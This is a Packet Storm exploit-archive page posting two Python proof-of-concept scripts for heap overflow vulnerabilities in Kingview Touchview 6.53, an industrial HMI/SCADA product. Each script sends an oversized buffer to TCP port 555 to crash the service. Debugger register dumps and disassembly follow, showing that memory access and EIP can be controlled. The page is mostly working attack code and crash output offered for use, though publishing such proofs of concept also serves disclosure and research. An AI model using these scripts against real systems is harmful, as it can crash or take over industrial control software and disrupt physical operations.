exploit the possibilities

Kingview Touchview 6.53 Heap Overflows

Kingview Touchview 6.53 Heap Overflows
Posted Jun 25, 2012
Authored by Carlos Mario Penagos Hollmann

Kingview Touchview version 6.53 suffers from multiple heap overflow vulnerabilities.

tags | exploit, overflow, vulnerability
MD5 | 13b5fa51547273873ea1c36fdc30c174

Kingview Touchview 6.53 Heap Overflows

Change Mirror Download
# Exploit Title: Kingview 6.53 touchview.exe heap overflow 2
# Date: June 24 2012
# Exploit Author: Carlos Mario Penagos Hollmann
# Vendor Homepage: www.kingview.com

# Version: 6.53
# Tested on: Windows SP 1
# CVE :

Open kingivew click on Make choose network configuration--->network
parameter , then go to the node type and choose Local is a Login Server,
run the demo port 555 will be open.
NOTE:
This was already patched by the vendor silently.

import os
import socket
import sys

host ="10.0.2.15"
port = 555

exploit=("D"*70000)
s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s2.connect((host,port))
s2.send(exploit)
data = s2.recv(1024)
s2.close()

eax=42424242 ebx=00140000 ecx=0098ffff edx=00990000 esi=00140748
edi=00000004
eip=7c902a9d esp=0012f0b8 ebp=00140748 iopl=0 nv up ei pl nz na pe
nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
efl=00010206
ntdll!tan+0xcf:
7c902a9d 8b18 mov ebx,dword ptr [eax] ds:0023:42424242=?????
c902a8d 55 push ebp
7c902a8e 8be9 mov ebp,ecx
7c902a90 8b5504 mov edx,dword ptr [ebp+4]
7c902a93 8b4500 mov eax,dword ptr [ebp]
7c902a96 0bc0 or eax,eax
7c902a98 740c je ntdll!tan+0xd8 (7c902aa6)
7c902a9a 8d4aff lea ecx,[edx-1]
7c902a9d 8b18 mov ebx,dword ptr [eax]
ds:0023:42424242=????????
7c902a9f f00fc74d00 lock cmpxchg8b qword ptr [ebp]
7c902aa4 75f0 jne ntdll!tan+0xc8 (7c902a96)
7c902aa6 5d pop ebp
7c902aa7 5b pop ebx
7c902aa8 c3 ret
7c902aa9 8d4900 lea ecx,[ecx]
7c902aac 8f0424 pop dword ptr [esp]
7c902aaf 90 nop
7c902ab0 53 push ebx
7c902ab1 55 push ebp



###############################################################


# Exploit Title: Kingview Touchview EIP direct control
# Date: June 24 2012
# Exploit Author: Carlos Mario Penagos Hollmann
# Vendor Homepage: www.kingview.com

# Version: 6.53
# Tested on: Windows SP 1
# CVE :

Open kingivew click on Make choose network configuration--->network
parameter , then go to the node type and choose Local is a Login Server,
run the demo port 555 will be open.
NOTE:
This was already patched by the vendor silently.


import os
import socket
import sys

host ="10.0.2.15"
port = 555

exploit=("B"*80000)




s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s2.connect((host,port))
s2.send(exploit)
data = s2.recv(1024)
s2.close()

7c91b1ea 8b4610 mov eax,dword ptr [esi+10h]
7c91b1ed 3bc3 cmp eax,ebx
7c91b1ef 8945fc mov dword ptr [ebp-4],eax
7c91b1f2 0f849e000000 je ntdll!RtlpUnWaitCriticalSection+0x2f
(7c91b296)
7c91b1f8 8b06 mov eax,dword ptr [esi]
7c91b1fa ff4010 inc dword ptr [eax+10h]
ds:0023:42424252=????????
7c91b1fd 8b45fc mov eax,dword ptr [ebp-4]
7c91b200 83e001 and eax,1
7c91b203 8945e8 mov dword ptr [ebp-18h],eax


ntdll!RtlpWaitForCriticalSection+0x5b

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

August 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    10 Files
  • 2
    Aug 2nd
    8 Files
  • 3
    Aug 3rd
    2 Files
  • 4
    Aug 4th
    1 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    79 Files
  • 7
    Aug 7th
    16 Files
  • 8
    Aug 8th
    10 Files
  • 9
    Aug 9th
    10 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    6 Files
  • 12
    Aug 12th
    26 Files
  • 13
    Aug 13th
    15 Files
  • 14
    Aug 14th
    19 Files
  • 15
    Aug 15th
    52 Files
  • 16
    Aug 16th
    11 Files
  • 17
    Aug 17th
    1 Files
  • 18
    Aug 18th
    2 Files
  • 19
    Aug 19th
    18 Files
  • 20
    Aug 20th
    19 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close